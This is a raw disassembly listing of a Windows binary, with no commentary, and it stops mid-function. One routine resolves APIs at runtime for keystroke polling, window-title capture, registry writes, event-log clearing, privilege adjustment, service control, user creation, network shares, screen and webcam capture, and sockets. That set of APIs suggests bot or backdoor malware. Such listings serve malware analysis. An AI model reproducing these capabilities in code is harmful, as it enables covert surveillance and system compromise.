cmp dword_4E3154, ebx
mov dword_4E3038, eax
jz short loc_409FC2
cmp dword_4E3104, ebx
jz short loc_409FC2
cmp dword_4E3098, ebx
jz short loc_409FC2
cmp dword_4E31A8, ebx
jz short loc_409FC2
cmp dword_4E30C8, ebx
jz short loc_409FC2
cmp dword_4E30E8, ebx
jz short loc_409FC2
cmp dword_4E314C, ebx
jz short loc_409FC2
cmp eax, ebx
jnz short loc_409FCC
loc_409FC2: ; CODE XREF: sub_409DD4+1B8�j
; sub_409DD4+1C0�j ...
mov dword_4E31C0, 1
loc_409FCC: ; CODE XREF: sub_409DD4+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_4E30C4, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_4E2FCC, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_4E3094, eax
call esi ; GetProcAddress
cmp dword_4E30C4, ebx
mov dword_4E307C, eax
jz short loc_40A029
cmp dword_4E2FCC, ebx
jz short loc_40A029
cmp dword_4E3094, ebx
jz short loc_40A029
cmp eax, ebx
jnz short loc_40A033
jmp short loc_40A029
; ---------------------------------------------------------------------------
loc_40A01E: ; CODE XREF: sub_409DD4+144�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31C4, eax
loc_40A029: ; CODE XREF: sub_409DD4+232�j
; sub_409DD4+23A�j ...
mov dword_4E31C0, 1
loc_40A033: ; CODE XREF: sub_409DD4+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40A1EC
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4E3168, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4E30AC, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4E311C, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4E2FF8, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4E305C, eax
call esi ; GetProcAddress
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_4E30D4, eax
call esi ; GetProcAddress
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov dword_4E3078, eax
call esi ; GetProcAddress
cmp dword_4E3168, ebx
mov dword_4E3088, eax
jz short loc_40A0DC
cmp dword_4E30AC, ebx
jz short loc_40A0DC
cmp dword_4E311C, ebx
jz short loc_40A0DC
cmp dword_4E2FF8, ebx
jz short loc_40A0DC
cmp dword_4E305C, ebx
jz short loc_40A0DC
cmp dword_4E30D4, ebx
jnz short loc_40A0E6
loc_40A0DC: ; CODE XREF: sub_409DD4+2DE�j
; sub_409DD4+2E6�j ...
mov dword_4E31C8, 1
loc_40A0E6: ; CODE XREF: sub_409DD4+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4E30DC, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4E30B4, eax
call esi ; GetProcAddress
cmp dword_4E30DC, ebx
mov dword_4E3164, eax
jz short loc_40A121
cmp dword_4E30B4, ebx
jz short loc_40A121
cmp eax, ebx
jnz short loc_40A12B
loc_40A121: ; CODE XREF: sub_409DD4+33F�j
; sub_409DD4+347�j
mov dword_4E31C8, 1
loc_40A12B: ; CODE XREF: sub_409DD4+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4E30EC, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4E2FD4, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4E2FDC, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4E3040, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4E3044, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4E2FF0, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4E30B8, eax
call esi ; GetProcAddress
cmp dword_4E30EC, ebx
mov dword_4E2FE0, eax
jz short loc_40A1CF
cmp dword_4E2FD4, ebx
jz short loc_40A1CF
cmp dword_4E2FDC, ebx
jz short loc_40A1CF
cmp dword_4E3040, ebx
jz short loc_40A1CF
cmp dword_4E3044, ebx
jz short loc_40A1CF
cmp dword_4E2FF0, ebx
jz short loc_40A1CF
cmp dword_4E30B8, ebx
jz short loc_40A1CF
cmp eax, ebx
jnz short loc_40A1D9
loc_40A1CF: ; CODE XREF: sub_409DD4+3C5�j
; sub_409DD4+3CD�j ...
mov dword_4E31C8, 1
loc_40A1D9: ; CODE XREF: sub_409DD4+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4E2FD8, eax
jnz short loc_40A201
jmp short loc_40A1F7
; ---------------------------------------------------------------------------
loc_40A1EC: ; CODE XREF: sub_409DD4+26A�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31CC, eax
loc_40A1F7: ; CODE XREF: sub_409DD4+416�j
mov dword_4E31C8, 1
loc_40A201: ; CODE XREF: sub_409DD4+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40A2CD
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4E30E4, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4E313C, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_4E3144, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_4E3100, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4E301C, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_4E2FC8, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_4E3140, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4E2FB4, eax
call esi ; GetProcAddress
cmp dword_4E30E4, ebx
mov dword_4E3054, eax
jz short loc_40A2D8
cmp dword_4E313C, ebx
jz short loc_40A2D8
cmp dword_4E3144, ebx
jz short loc_40A2D8
cmp dword_4E3100, ebx
jz short loc_40A2D8
cmp dword_4E301C, ebx
jz short loc_40A2D8
cmp dword_4E2FC8, ebx
jz short loc_40A2D8
cmp dword_4E3140, ebx
jz short loc_40A2D8
cmp dword_4E2FB4, ebx
jz short loc_40A2D8
cmp eax, ebx
jnz short loc_40A2E2
jmp short loc_40A2D8
; ---------------------------------------------------------------------------
loc_40A2CD: ; CODE XREF: sub_409DD4+438�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31D4, eax
loc_40A2D8: ; CODE XREF: sub_409DD4+4B9�j
; sub_409DD4+4C1�j ...
mov dword_4E31D0, 1
loc_40A2E2: ; CODE XREF: sub_409DD4+4F5�j
mov ebp, ds:dword_4F538C
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A59E
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4E3068, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_4E319C, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_4E3008, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4E2FE4, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4E30A4, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4E308C, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4E3050, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4E3178, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_4E3194, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4E30A0, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_4E3184, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_4E3138, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4E30F8, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4E30F4, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4E3028, eax
call esi ; GetProcAddress
push offset aSend_1 ; "send"
push edi
mov dword_4E3020, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_4E3148, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4E315C, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_4E3110, eax
call esi ; GetProcAddress
mov dword_4E30D0, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4E3124, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4E30E0, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4E3120, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4E318C, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_4E30D8, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_4E309C, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4E310C, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_4E317C, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4E30B0, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4E304C, eax
call esi ; GetProcAddress
cmp dword_4E3068, ebx
mov dword_4E3190, eax
jz loc_40A5A9
cmp dword_4E319C, ebx
jz loc_40A5A9
cmp dword_4E3008, ebx
jz loc_40A5A9
cmp dword_4E30A4, ebx
jz loc_40A5A9
cmp dword_4E308C, ebx
jz loc_40A5A9
cmp dword_4E3050, ebx
jz loc_40A5A9
cmp dword_4E3178, ebx
jz loc_40A5A9
cmp dword_4E3194, ebx
jz loc_40A5A9
cmp dword_4E30A0, ebx
jz loc_40A5A9
cmp dword_4E3184, ebx
jz loc_40A5A9
cmp dword_4E3138, ebx
jz loc_40A5A9
cmp dword_4E30F8, ebx
jz loc_40A5A9
cmp dword_4E30F4, ebx
jz loc_40A5A9
cmp dword_4E3028, ebx
jz short loc_40A5A9
cmp dword_4E3148, ebx
jz short loc_40A5A9
cmp dword_4E315C, ebx
jz short loc_40A5A9
cmp dword_4E3110, ebx
jz short loc_40A5A9
cmp dword_4E30D0, ebx
jz short loc_40A5A9
cmp dword_4E3124, ebx
jz short loc_40A5A9
cmp dword_4E30E0, ebx
jz short loc_40A5A9
cmp dword_4E3120, ebx
jz short loc_40A5A9
cmp dword_4E318C, ebx
jz short loc_40A5A9
cmp dword_4E30D8, ebx
jz short loc_40A5A9
cmp dword_4E309C, ebx
jz short loc_40A5A9
cmp dword_4E310C, ebx
jz short loc_40A5A9
cmp dword_4E317C, ebx
jz short loc_40A5A9
cmp dword_4E30B0, ebx
jz short loc_40A5A9
cmp eax, ebx
jnz short loc_40A5B3
jmp short loc_40A5A9
; ---------------------------------------------------------------------------
loc_40A59E: ; CODE XREF: sub_409DD4+51F�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31DC, eax
loc_40A5A9: ; CODE XREF: sub_409DD4+6BE�j
; sub_409DD4+6CA�j ...
mov dword_4E31D8, 1
loc_40A5B3: ; CODE XREF: sub_409DD4+7C6�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A6B8
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_4E3034, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4E2FBC, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4E30C0, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4E306C, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4E30CC, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_4E3090, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4E2FFC, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_4E2FF4, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4E3004, eax
call esi ; GetProcAddress
cmp dword_4E3034, ebx
mov ecx, dword_4E3090
mov dword_4E312C, eax
jz short loc_40A694
cmp dword_4E2FBC, ebx
jz short loc_40A694
cmp dword_4E30C0, ebx
jz short loc_40A694
cmp dword_4E306C, ebx
jz short loc_40A694
cmp dword_4E30CC, ebx
jz short loc_40A694
cmp ecx, ebx
jz short loc_40A694
cmp dword_4E2FFC, ebx
jz short loc_40A694
cmp dword_4E2FF4, ebx
jz short loc_40A694
cmp dword_4E3004, ebx
jz short loc_40A694
cmp eax, ebx
jnz short loc_40A69E
loc_40A694: ; CODE XREF: sub_409DD4+87E�j
; sub_409DD4+886�j ...
mov dword_4E31E0, 1
loc_40A69E: ; CODE XREF: sub_409DD4+8BE�j
cmp ecx, ebx
jz short loc_40A6D3
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_4E30A8, eax
jnz short loc_40A6D3
jmp short loc_40A6CD
; ---------------------------------------------------------------------------
loc_40A6B8: ; CODE XREF: sub_409DD4+7EA�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31E4, eax
mov dword_4E31E0, 1
loc_40A6CD: ; CODE XREF: sub_409DD4+8E2�j
mov dword_4E30A8, ebx
loc_40A6D3: ; CODE XREF: sub_409DD4+8CC�j
; sub_409DD4+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A71D
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4E3080, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_4E31B0, eax
call esi ; GetProcAddress
cmp dword_4E3080, ebx
mov dword_4E3010, eax
jz short loc_40A728
cmp dword_4E31B0, ebx
jz short loc_40A728
cmp eax, ebx
jnz short loc_40A732
jmp short loc_40A728
; ---------------------------------------------------------------------------
loc_40A71D: ; CODE XREF: sub_409DD4+90A�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31EC, eax
loc_40A728: ; CODE XREF: sub_409DD4+939�j
; sub_409DD4+941�j ...
mov dword_4E31E8, 1
loc_40A732: ; CODE XREF: sub_409DD4+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A839
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4E2FEC, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4E2FC4, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4E303C, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4E3070, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4E3188, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_4E3024, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4E2FD0, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4E2FC0, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4E3058, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4E3150, eax
call esi ; GetProcAddress
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov dword_4E3108, eax
call esi ; GetProcAddress
cmp dword_4E2FEC, ebx
mov dword_4E302C, eax
jz short loc_40A844
cmp dword_4E2FC4, ebx
jz short loc_40A844
cmp dword_4E303C, ebx
jz short loc_40A844
cmp dword_4E3070, ebx
jz short loc_40A844
cmp dword_4E3188, ebx
jz short loc_40A844
cmp dword_4E3024, ebx
jz short loc_40A844
cmp dword_4E2FD0, ebx
jz short loc_40A844
cmp dword_4E2FC0, ebx
jz short loc_40A844
cmp dword_4E3058, ebx
jz short loc_40A844
cmp dword_4E3150, ebx
jz short loc_40A844
cmp dword_4E3108, ebx
jnz short loc_40A84E
jmp short loc_40A844
; ---------------------------------------------------------------------------
loc_40A839: ; CODE XREF: sub_409DD4+969�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31F4, eax
loc_40A844: ; CODE XREF: sub_409DD4+A11�j
; sub_409DD4+A19�j ...
mov dword_4E31F0, 1
loc_40A84E: ; CODE XREF: sub_409DD4+A61�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A883
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4E3014, eax
call esi ; GetProcAddress
cmp dword_4E3014, ebx
mov dword_4E30F0, eax
jz short loc_40A88E
cmp eax, ebx
jnz short loc_40A898
jmp short loc_40A88E
; ---------------------------------------------------------------------------
loc_40A883: ; CODE XREF: sub_409DD4+A85�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31FC, eax
loc_40A88E: ; CODE XREF: sub_409DD4+AA7�j
; sub_409DD4+AAD�j
mov dword_4E31F8, 1
loc_40A898: ; CODE XREF: sub_409DD4+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A8CD
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4E3174, eax
call esi ; GetProcAddress
cmp dword_4E3174, ebx
mov dword_4E3170, eax
jz short loc_40A8D8
cmp eax, ebx
jnz short loc_40A8E2
jmp short loc_40A8D8
; ---------------------------------------------------------------------------
loc_40A8CD: ; CODE XREF: sub_409DD4+ACF�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E3204, eax
loc_40A8D8: ; CODE XREF: sub_409DD4+AF1�j
; sub_409DD4+AF7�j
mov dword_4E3200, 1
loc_40A8E2: ; CODE XREF: sub_409DD4+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A941
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4E31A0, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4E3198, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4E3160, eax
call esi ; GetProcAddress
cmp dword_4E31A0, ebx
mov dword_4E3030, eax
jz short loc_40A94C
cmp dword_4E3198, ebx
jz short loc_40A94C
cmp dword_4E3160, ebx
jz short loc_40A94C
cmp eax, ebx
jnz short loc_40A956
jmp short loc_40A94C
; ---------------------------------------------------------------------------
loc_40A941: ; CODE XREF: sub_409DD4+B19�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E320C, eax
loc_40A94C: ; CODE XREF: sub_409DD4+B55�j
; sub_409DD4+B5D�j ...
mov dword_4E3208, 1
loc_40A956: ; CODE XREF: sub_409DD4+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A98B
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4E3064, eax
call esi ; GetProcAddress
cmp dword_4E3064, ebx
mov dword_4E316C, eax
jz short loc_40A996
cmp eax, ebx
jnz short loc_40A9A0
jmp short loc_40A996
; ---------------------------------------------------------------------------
loc_40A98B: ; CODE XREF: sub_409DD4+B8D�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E3214, eax
loc_40A996: ; CODE XREF: sub_409DD4+BAF�j
; sub_409DD4+BB5�j
mov dword_4E3210, 1
loc_40A9A0: ; CODE XREF: sub_409DD4+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40AA29
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4E3134, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4E3180, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4E30BC, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4E3074, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4E3114, eax
call esi ; GetProcAddress
cmp dword_4E3134, ebx
mov dword_4E3084, eax
jz short loc_40AA34
cmp dword_4E3180, ebx
jz short loc_40AA34
cmp dword_4E30BC, ebx
jz short loc_40AA34
cmp dword_4E3074, ebx
jz short loc_40AA34
cmp dword_4E3114, ebx
jz short loc_40AA34
cmp eax, ebx
jnz short loc_40AA3E
jmp short loc_40AA34
; ---------------------------------------------------------------------------
loc_40AA29: ; CODE XREF: sub_409DD4+BD7�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E321C, eax
loc_40AA34: ; CODE XREF: sub_409DD4+C2D�j
; sub_409DD4+C35�j ...
mov dword_4E3218, 1
loc_40AA3E: ; CODE XREF: sub_409DD4+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40AA73
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_4E3048, eax
call esi ; GetProcAddress
cmp dword_4E3048, ebx
mov dword_4E3128, eax
jz short loc_40AA7E
cmp eax, ebx
jnz short loc_40AA88
jmp short loc_40AA7E
; ---------------------------------------------------------------------------
loc_40AA73: ; CODE XREF: sub_409DD4+C75�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E3224, eax
loc_40AA7E: ; CODE XREF: sub_409DD4+C97�j
; sub_409DD4+C9D�j
mov dword_4E3220, 1
loc_40AA88: ; CODE XREF: sub_409DD4+C9B�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409DD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AA90(int,char *Str,int,int)
sub_40AA90 proc near ; CODE XREF: sub_401CC7+2527�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+Str]
push esi
xor esi, esi
cmp dword_4E31B8, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40AAD8
push dword_4E31BC
lea eax, [ebp+Dest]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AAD8: ; CODE XREF: sub_40AA90+1A�j
cmp dword_4E31C0, esi
jz short loc_40AB0C
push dword_4E31C4
lea eax, [ebp+Dest]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AB0C: ; CODE XREF: sub_40AA90+4E�j
cmp dword_4E31C8, esi
jz short loc_40AB40
push dword_4E31CC
lea eax, [ebp+Dest]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AB40: ; CODE XREF: sub_40AA90+82�j
cmp dword_4E31D0, esi
jz short loc_40AB74
push dword_4E31D4
lea eax, [ebp+Dest]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AB74: ; CODE XREF: sub_40AA90+B6�j
cmp dword_4E31D8, esi
jz short loc_40ABA8
push dword_4E31DC
lea eax, [ebp+Dest]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40ABA8: ; CODE XREF: sub_40AA90+EA�j
cmp dword_4E31E0, esi
jz short loc_40ABDC
push dword_4E31E4
lea eax, [ebp+Dest]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40ABDC: ; CODE XREF: sub_40AA90+11E�j
cmp dword_4E31E8, esi
jz short loc_40AC10
push dword_4E31EC
lea eax, [ebp+Dest]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AC10: ; CODE XREF: sub_40AA90+152�j
cmp dword_4E31F0, esi
jz short loc_40AC44
push dword_4E31F4
lea eax, [ebp+Dest]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AC44: ; CODE XREF: sub_40AA90+186�j
cmp dword_4E31F8, esi
jz short loc_40AC78
push dword_4E31FC
lea eax, [ebp+Dest]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AC78: ; CODE XREF: sub_40AA90+1BA�j
cmp dword_4E3200, esi
jz short loc_40ACAC
push dword_4E3204
lea eax, [ebp+Dest]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40ACAC: ; CODE XREF: sub_40AA90+1EE�j
cmp dword_4E3208, esi
jz short loc_40ACE0
push dword_4E320C
lea eax, [ebp+Dest]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
